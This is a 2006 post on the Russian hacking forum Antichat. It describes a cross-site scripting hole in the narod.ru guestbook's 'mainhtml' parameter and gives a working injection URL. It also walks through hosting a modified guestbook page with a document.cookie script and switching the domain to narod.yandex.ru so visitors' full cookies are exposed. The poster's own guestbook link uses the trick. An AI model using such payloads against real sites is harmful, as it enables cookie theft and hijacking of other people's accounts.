Форум АНТИЧАТ - Xss народ.ру

Xss народ.ру

05.10.2006, 10:38

~~bul.666~~

Banned

Регистрация: 06.06.2006

Сообщений: 944

Провел на форуме:
3986705

Репутация: 1403

Отправить сообщение для bul.666 с помощью ICQ

Xss народ.ру

Не знаю было это или нет... Вообщем читаемс...

1. _http://www.narod.ru/guestbook/?owner=49329156&mainhtml=%3Cscript%3Ealert()%3C/script%3E
2. Создали себе сайт с гостевой книгой...
Создайем на сайте файл - text.txt

Зайходим в сорцы нашей гесты, копирусем все и вставляем в text.txt...

Теперь надо нам просто добавить скрипт - ловушку, я добавил просто
<script>alert(document.cookie);</script>...

Правим сцылку... Первоночально сцылка на гесту показывает нам, что гостевуха в домене narod.ru, а значит там нам не будет показываться полные куки...
Ну дык какая хрен разница? Исправим ейе на narod.yandex.ru...

Теперь а чтоже делать с text.txt? Добавляем к ссылке на гесту &mainhtml=text.txt

Теперь заходим по этой ссылке и видимс наши печенюшки =)))

Извиняюсь, если это уже где то было... =))))

Вот моя геста = _http://www.narod.yandex.ru/guestbook/?owner=49329156&mainhtml=text.txt

Скажу сразу там нет снифера! =))))